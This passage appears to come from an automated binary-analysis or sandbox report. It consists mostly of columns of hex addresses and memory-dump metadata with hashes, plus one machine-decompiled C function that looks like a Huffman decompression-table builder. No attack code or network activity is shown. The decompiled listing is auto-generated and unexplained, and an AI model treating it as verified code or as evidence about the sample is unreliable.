                                      0x00406407
                                      0x00000000
                                      0x00000000
                                      0x0040640d
                                      0x0040640d
                                      0x00000000
                                      0x0040640d
                                      0x004063e3
                                      0x004063e6
                                      0x004063ed
                                      0x004063f0
                                      0x00000000
                                      0x004063f0
                                      0x004063cc
                                      0x004063d0
                                      0x004063d3
                                      0x00000000
                                      0x00000000
                                      0x00406418
                                      0x00406418
                                      0x0040643d
                                      0x0040643d
                                      0x0040643d
                                      0x0040643f
                                      0x00000000
                                      0x00000000
                                      0x0040641d
                                      0x0040641d
                                      0x00406421
                                      0x00000000
                                      0x00000000
                                      0x00406427
                                      0x00406427
                                      0x0040642a
                                      0x0040642d
                                      0x00406430
                                      0x00406432
                                      0x00406434
                                      0x00406437
                                      0x0040643a
                                      0x0040643a
                                      0x0040643a
                                      0x00406441
                                      0x00406449
                                      0x0040644c
                                      0x0040644f
                                      0x00406451
                                      0x00406454
                                      0x00406454
                                      0x00406456
                                      0x0040645a
                                      0x0040645d
                                      0x00406460
                                      0x00406463
                                      0x00000000
                                      0x00000000
                                      0x00406469
                                      0x00406469
                                      0x0040648e
                                      0x0040648e
                                      0x0040648e
                                      0x00406490
                                      0x00000000
                                      0x00000000
                                      0x0040646e
                                      0x0040646e
                                      0x00406472
                                      0x00000000
                                      0x00000000
                                      0x00406478
                                      0x00406478
                                      0x0040647b
                                      0x0040647e
                                      0x00406481
                                      0x00406483
                                      0x00406485
                                      0x00406488
                                      0x0040648b
                                      0x0040648b
                                      0x0040648b
                                      0x00406492
                                      0x00406492
                                      0x0040649a
                                      0x0040649d
                                      0x004064a0
                                      0x004064a3
                                      0x004064a7
                                      0x004064aa
                                      0x004064ac
                                      0x004064af
                                      0x004064b2
                                      0x004064cc
                                      0x004064cc
                                      0x004064cf
                                      0x00000000
                                      0x00000000
                                      0x004064d5
                                      0x004064d5
                                      0x004064d8
                                      0x004064df
                                      0x00000000
                                      0x004064df
                                      0x004064b4
                                      0x004064b7
                                      0x004064be
                                      0x004064c1
                                      0x00000000
                                      0x00000000
                                      0x004064e7
                                      0x004064e7
                                      0x0040650c
                                      0x0040650c
                                      0x0040650c
                                      0x0040650e
                                      0x00000000
                                      0x00000000
                                      0x004064ec
                                      0x004064ec
                                      0x004064f0
                                      0x00000000
                                      0x00000000
                                      0x004064f6
                                      0x004064f6
                                      0x004064f9
                                      0x004064fc
                                      0x004064ff
                                      0x00406501
                                      0x00406503
                                      0x00406506
                                      0x00406509
                                      0x00406509
                                      0x00406509
                                      0x00406510
                                      0x00406518
                                      0x0040651b
                                      0x0040651e
                                      0x00406520
                                      0x00406523
                                      0x00406523
                                      0x00406525
                                      0x00000000
                                      0x00000000
                                      0x0040652b
                                      0x0040652b
                                      0x0040652e
                                      0x00406533
                                      0x00406535
                                      0x0040653b
                                      0x0040653d
                                      0x00406552
                                      0x00406554
                                      0x00406554
                                      0x0040653f
                                      0x00406545
                                      0x00406547
                                      0x00406549
                                      0x00406549
                                      0x00406556
                                      0x0040655a
                                      0x0040655d
                                      0x00406563
                                      0x00406563
                                      0x00406566
                                      0x00406566
                                      0x00406566
                                      0x00406568
                                      0x00000000
                                      0x00000000
                                      0x0040656e
                                      0x0040656e
                                      0x00406574
                                      0x00406576
                                      0x0040659b
                                      0x0040659e
                                      0x004065a4
                                      0x004065a9
                                      0x004065af
                                      0x004065b5
                                      0x004065b7
                                      0x004065ba
                                      0x004065c3
                                      0x004065c9
                                      0x004065c9
                                      0x004065bc
                                      0x004065be
                                      0x004065c0
                                      0x004065c0
                                      0x004065cb
                                      0x004065d1
                                      0x004065d3
                                      0x004065d6
                                      0x004065d8
                                      0x004065de
                                      0x004065e0
                                      0x004065e2
                                      0x004065e4
                                      0x004065e6
                                      0x004065e9
                                      0x004065f2
                                      0x004065f5
                                      0x004065f5
                                      0x004065eb
                                      0x004065eb
                                      0x004065ee
                                      0x004065ee
                                      0x004065e9
                                      0x004065e0
                                      0x004065f7
                                      0x004065f9
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004065f9
                                      0x00406578
                                      0x00406578
                                      0x0040657e
                                      0x00406584
                                      0x00406586
                                      0x00000000
                                      0x00000000
                                      0x00406588
                                      0x00406588
                                      0x0040658a
                                      0x0040658c
                                      0x00406595
                                      0x00406595
                                      0x0040658e
                                      0x0040658e
                                      0x00406591
                                      0x00406591
                                      0x00406597
                                      0x00406599
                                      0x00000000
                                      0x00000000
                                      0x004065ff
                                      0x004065ff
                                      0x00406604
                                      0x00406606
                                      0x00406607
                                      0x00406608
                                      0x00406609
                                      0x0040660f
                                      0x00406612
                                      0x00406615
                                      0x00406618
                                      0x0040661a
                                      0x00406620
                                      0x00406620
                                      0x00406623
                                      0x00406623
                                      0x00406623
                                      0x00406623
                                      0x0040662c
                                      0x00000000
                                      0x00000000
                                      0x00406631
                                      0x00406631
                                      0x00406634
                                      0x00406637
                                      0x00406639
                                      0x004066d0
                                      0x004066d0
                                      0x004066d3
                                      0x004066d5
                                      0x004066d6
                                      0x004066d7
                                      0x004066da
                                      0x00000000
                                      0x004066da
                                      0x0040663f
                                      0x0040663f
                                      0x00406645
                                      0x00406647
                                      0x0040666c
                                      0x0040666f
                                      0x00406675
                                      0x0040667a
                                      0x00406680
                                      0x00406686
                                      0x00406688
                                      0x0040668b
                                      0x00406694
                                      0x0040669a
                                      0x0040669a
                                      0x0040668d
                                      0x0040668f
                                      0x00406691
                                      0x00406691
                                      0x0040669c
                                      0x004066a2
                                      0x004066a4
                                      0x004066a7
                                      0x004066a9
                                      0x004066af
                                      0x004066b1
                                      0x004066b3
                                      0x004066b5
                                      0x004066b7
                                      0x004066ba
                                      0x004066c3
                                      0x004066c6
                                      0x004066c6
                                      0x004066bc
                                      0x004066bc
                                      0x004066bf
                                      0x004066bf
                                      0x004066ba
                                      0x004066b1
                                      0x004066c8
                                      0x004066ca
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004066ca
                                      0x00406649
                                      0x00406649
                                      0x0040664f
                                      0x00406655
                                      0x00406657
                                      0x00000000
                                      0x00000000
                                      0x00406659
                                      0x00406659
                                      0x0040665b
                                      0x0040665d
                                      0x00406664
                                      0x00406664
                                      0x00406666
                                      0x0040665f
                                      0x0040665f
                                      0x00406661
                                      0x00406661
                                      0x00406668
                                      0x0040666a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004066e2
                                      0x004066e2
                                      0x004066e5
                                      0x004066e7
                                      0x004066ea
                                      0x004066ed
                                      0x004066ed
                                      0x004066ed
                                      0x004066ed
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405d9b
                                      0x00405d7f
                                      0x00000000
                                      0x00405d85
                                      0x00405d88
                                      0x00405d92
                                      0x00405d95
                                      0x00405d98
                                      0x00000000
                                      0x00405d98
                                      0x00405d7f
                                      0x00405da3
                                      0x00405da6
                                      0x00405daa
                                      0x00405db4
                                      0x00405dbe
                                      0x00405dc1
                                      0x00405dc7
                                      0x00405efb
                                      0x00405efd
                                      0x00405f03
                                      0x00405f06
                                      0x00405f09
                                      0x00000000
                                      0x00405f09
                                      0x00405dcd
                                      0x00405dcd
                                      0x00405dce
                                      0x00405e26
                                      0x00405e26
                                      0x00405e2d
                                      0x00405ed3
                                      0x00405ed3
                                      0x00405ed8
                                      0x00405edb
                                      0x00405ee0
                                      0x00405ee3
                                      0x00405ee8
                                      0x00405eeb
                                      0x00405ef0
                                      0x00405ef3
                                      0x00405ef3
                                      0x00000000
                                      0x00405e33
                                      0x00405e33
                                      0x00405e33
                                      0x00405e33
                                      0x00405e37
                                      0x00405e37
                                      0x00405e59
                                      0x00405e5c
                                      0x00405e5e
                                      0x00405e61
                                      0x00405e66
                                      0x00405e3c
                                      0x00405e3c
                                      0x00405e41
                                      0x00405e43
                                      0x00405e45
                                      0x00405e4a
                                      0x00405e50
                                      0x00405e55
                                      0x00405e57
                                      0x00405e57
                                      0x00405e4c
                                      0x00405e4c
                                      0x00405e4c
                                      0x00405e4a
                                      0x00000000
                                      0x00405e68
                                      0x00405e95
                                      0x00405e9a
                                      0x00405e9c
                                      0x00405e9d
                                      0x00405e9f
                                      0x00405ea0
                                      0x00405ea0
                                      0x00405ea0
                                      0x00405ec8
                                      0x00405ecd
                                      0x00405ecd
                                      0x00000000
                                      0x00405ecd
                                      0x00405e66
                                      0x00405e2d
                                      0x00405dd0
                                      0x00405dd0
                                      0x00405dd1
                                      0x00405e1b
                                      0x00000000
                                      0x00405e1b
                                      0x00405dd3
                                      0x00405dd4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405f30
                                      0x00405f30
                                      0x00405f30
                                      0x00405f33
                                      0x00000000
                                      0x00000000
                                      0x00405f10
                                      0x00405f10
                                      0x00405f14
                                      0x00000000
                                      0x00000000
                                      0x00405f1a
                                      0x00405f1a
                                      0x00405f1d
                                      0x00405f20
                                      0x00405f25
                                      0x00405f27
                                      0x00405f2a
                                      0x00405f2d
                                      0x00405f2d
                                      0x00405f2d
                                      0x00405f35
                                      0x00405f35
                                      0x00405f38
                                      0x00405f3a
                                      0x00405f3f
                                      0x00405f42
                                      0x00405f44
                                      0x00405f47
                                      0x00000000
                                      0x00000000
                                      0x00405f4d
                                      0x00405f4d
                                      0x00405f4f
                                      0x00000000
                                      0x00000000
                                      0x00405f55
                                      0x00405f55
                                      0x00405f59
                                      0x00000000
                                      0x00000000
                                      0x00405f5f
                                      0x00405f5f
                                      0x00405f62
                                      0x00405f64
                                      0x00406002
                                      0x00406002
                                      0x00406005
                                      0x00406007
                                      0x00406007
                                      0x0040600a
                                      0x0040600d
                                      0x0040600f
                                      0x00406011
                                      0x00406013
                                      0x00406013
                                      0x0040601c
                                      0x00406021
                                      0x00406024
                                      0x00406027
                                      0x0040602a
                                      0x0040602d
                                      0x0040602d
                                      0x0040602d
                                      0x00406030
                                      0x00406036
                                      0x00406036
                                      0x0040603c
                                      0x0040603c
                                      0x0040603c
                                      0x00000000
                                      0x00406030
                                      0x00405f6a
                                      0x00405f6a
                                      0x00405f70
                                      0x00405f73
                                      0x00405f75
                                      0x00405fa0
                                      0x00405fa3
                                      0x00405fa9
                                      0x00405fae
                                      0x00405fb4
                                      0x00405fba
                                      0x00405fbc
                                      0x00405fbf
                                      0x00405fc8
                                      0x00405fce
                                      0x00405fce
                                      0x00405fc1
                                      0x00405fc3
                                      0x00405fc5
                                      0x00405fc5
                                      0x00405fd0
                                      0x00405fd6
                                      0x00405fd9
                                      0x00405fdb
                                      0x00405fdd
                                      0x00405fe3
                                      0x00405fe5
                                      0x00405fe7
                                      0x00405fea
                                      0x00405ff3
                                      0x00405ff3
                                      0x00405ff5
                                      0x00405fec
                                      0x00405fec
                                      0x00405fef
                                      0x00405fef
                                      0x00405ff7
                                      0x00405ff7
                                      0x00405fe5
                                      0x00405ffa
                                      0x00405ffc
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405ffc
                                      0x00405f77
                                      0x00405f77
                                      0x00405f7d
                                      0x00405f83
                                      0x00405f85
                                      0x00000000
                                      0x00000000
                                      0x00405f87
                                      0x00405f87
                                      0x00405f89
                                      0x00405f8b
                                      0x00405f8e
                                      0x00405f95
                                      0x00405f95
                                      0x00405f97
                                      0x00405f90
                                      0x00405f90
                                      0x00405f92
                                      0x00405f92
                                      0x00405f99
                                      0x00405f9b
                                      0x00405f9e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004060a2
                                      0x004060a5
                                      0x004060a8
                                      0x004060ae
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406285
                                      0x00406285
                                      0x00406285
                                      0x00406288
                                      0x0040628b
                                      0x0040628d
                                      0x00406290
                                      0x00406296
                                      0x0040629d
                                      0x0040629f
                                      0x00000000
                                      0x00000000
                                      0x00406173
                                      0x00406173
                                      0x0040619b
                                      0x0040619b
                                      0x0040619b
                                      0x0040619d
                                      0x00000000
                                      0x00000000
                                      0x0040617b
                                      0x0040617b
                                      0x0040617f
                                      0x00000000
                                      0x00000000
                                      0x00406185
                                      0x00406185
                                      0x00406188
                                      0x0040618b
                                      0x0040618e
                                      0x00406190
                                      0x00406192
                                      0x00406195
                                      0x00406198
                                      0x00406198
                                      0x00406198
                                      0x0040619f
                                      0x0040619f
                                      0x004061a7
                                      0x004061aa
                                      0x004061b0
                                      0x004061b3
                                      0x004061b7
                                      0x004061bb
                                      0x004061be
                                      0x004061c1
                                      0x004061d9
                                      0x004061d9
                                      0x004061dc
                                      0x004061ea
                                      0x004061ed
                                      0x004061de
                                      0x004061de
                                      0x004061e0
                                      0x004061e7
                                      0x004061e7
                                      0x00406216
                                      0x00406216
                                      0x00406216
                                      0x00406219
                                      0x0040621b
                                      0x00000000
                                      0x00000000
                                      0x004061f6
                                      0x004061f6
                                      0x004061fa
                                      0x00000000
                                      0x00000000
                                      0x00406200
                                      0x00406200
                                      0x00406203
                                      0x00406206
                                      0x00406209
                                      0x0040620b
                                      0x0040620d
                                      0x00406210
                                      0x00406213
                                      0x00406213
                                      0x00406213
                                      0x0040621d
                                      0x0040621d
                                      0x0040621f
                                      0x00406221
                                      0x0040622c
                                      0x0040622f
                                      0x00406232
                                      0x00406234
                                      0x00406236
                                      0x00406238
                                      0x0040623b
                                      0x0040623e
                                      0x00406243
                                      0x00406246
                                      0x00406249
                                      0x0040624c
                                      0x00406253
                                      0x00406256
                                      0x00406258
                                      0x00000000
                                      0x00000000
                                      0x0040625e
                                      0x0040625e
                                      0x00406262
                                      0x00406273
                                      0x00406273
                                      0x00406273
                                      0x00406275
                                      0x00406275
                                      0x00406279
                                      0x00406279
                                      0x00406279
                                      0x0040627b
                                      0x0040627c
                                      0x0040627f
                                      0x0040627f
                                      0x0040627f
                                      0x00406282
                                      0x00000000
                                      0x00406282
                                      0x00406264
                                      0x00406264
                                      0x00406267
                                      0x00000000
                                      0x00000000
                                      0x0040626d
                                      0x0040626d
                                      0x00000000
                                      0x0040626d
                                      0x004061c3
                                      0x004061c3
                                      0x004061c5
                                      0x004061c7
                                      0x004061ca
                                      0x004061cd
                                      0x004061d1
                                      0x004061d1
                                      0x004062a5
                                      0x004062a5
                                      0x004062a8
                                      0x004062af
                                      0x004062b3
                                      0x004062b5
                                      0x004062b8
                                      0x004062bb
                                      0x004062c0
                                      0x004062c3
                                      0x004062c5
                                      0x004062c6
                                      0x004062c9
                                      0x004062d4
                                      0x004062d7
                                      0x004062ee
                                      0x004062f3
                                      0x004062fa
                                      0x004062ff
                                      0x00406303
                                      0x00406305
                                      0x00406305
                                      0x00406305
                                      0x00406308
                                      0x0040630a
                                      0x00000000
                                      0x00406310
                                      0x00406310
                                      0x00406314
                                      0x0040631f
                                      0x00406332
                                      0x00406337
                                      0x0040633c
                                      0x0040633e
                                      0x00000000
                                      0x00000000
                                      0x00406344
                                      0x00406344
                                      0x00406347
                                      0x00406349
                                      0x00406357
                                      0x00406357
                                      0x0040635a
                                      0x0040635a
                                      0x0040635d
                                      0x00406360
                                      0x00406363
                                      0x00406366
                                      0x00406369
                                      0x0040636c
                                      0x00000000
                                      0x0040636c
                                      0x0040634b
                                      0x0040634b
                                      0x00406351
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406351
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004066f0
                                      0x004066f0
                                      0x004066f6
                                      0x004066fc
                                      0x00406701
                                      0x00406707
                                      0x0040670d
                                      0x0040670f
                                      0x00406712
                                      0x0040671b
                                      0x00406721
                                      0x00406721
                                      0x00406714
                                      0x00406716
                                      0x00406718
                                      0x00406718
                                      0x00406723
                                      0x00406725
                                      0x00406728
                                      0x00406763
                                      0x00406763
                                      0x00000000
                                      0x0040672a
                                      0x0040672a
                                      0x0040672a
                                      0x00406730
                                      0x00406733
                                      0x00406735
                                      0x0040676a
                                      0x0040676c
                                      0x00000000
                                      0x0040676c
                                      0x00000000
                                      0x00406735
                                      0x00000000
                                      0x00405d74
                                      0x00406742
                                      0x00000000
                                      0x00406742
                                      0x00406156
                                      0x00406158
                                      0x00000000
                                      0x00000000
                                      0x0040615a
                                      0x0040615a
                                      0x0040615d
                                      0x00000000
                                      0x0040615d
                                      0x004060a2
                                      0x00406063
                                      0x00406747
                                      0x0040674a
                                      0x0040674c
                                      0x00406755
                                      0x0040675b
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                      • Instruction ID: e2ef9aa76577a7a1e17a70bef0141433c3d77918b2314780ae2ebb94a64f5d95
                                      • Opcode Fuzzy Hash: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                      • Instruction Fuzzy Hash: D1E17B71900709DFDB28CF58C884BAAB7F5EB44305F15852FE896AB291D378AA51CF14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000E867, Relevance: .3, Instructions: 331COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                      • Instruction ID: 796fb68eb1f87bea3f80c9806ef9223dd5081e047b6a400757c7a0e3bae678b6
                                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                      • Instruction Fuzzy Hash: 56C170322095D309FB5DC639847403EBAE2AB927F131B476DD4B6DB1D9EF20D924D620
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000E44F, Relevance: .3, Instructions: 323COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction ID: f57480ff781f2d253870521aa09b6984686a72b1ec4a2fd938c366b5bb3ccbe4
                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction Fuzzy Hash: 3EC172336095D309EB4DC639843413EBAE2AB917F1317476DD4BAEB1D9EF20CD249620
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040681A, Relevance: .3, Instructions: 300COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0040681A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42cdf0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42cdf0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42cdf0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                      0x00406825
                                      0x0040682d
                                      0x00406831
                                      0x00406833
                                      0x00406836
                                      0x00406838
                                      0x00406838
                                      0x0040683a
                                      0x00406841
                                      0x00406843
                                      0x00406843
                                      0x00406849
                                      0x0040685e
                                      0x00406866
                                      0x00406868
                                      0x0040686a
                                      0x0040686d
                                      0x0040686e
                                      0x0040686e
                                      0x00406874
                                      0x00000000
                                      0x00000000
                                      0x00406876
                                      0x00406879
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406879
                                      0x0040687d
                                      0x00406880
                                      0x00406882
                                      0x00406882
                                      0x00406885
                                      0x0040688b
                                      0x0040688c
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040688c
                                      0x00406891
                                      0x00406894
                                      0x00406896
                                      0x00406896
                                      0x0040689c
                                      0x0040689e
                                      0x004068af
                                      0x004068a2
                                      0x004068a6
                                      0x00406b4b
                                      0x00000000
                                      0x00406b4b
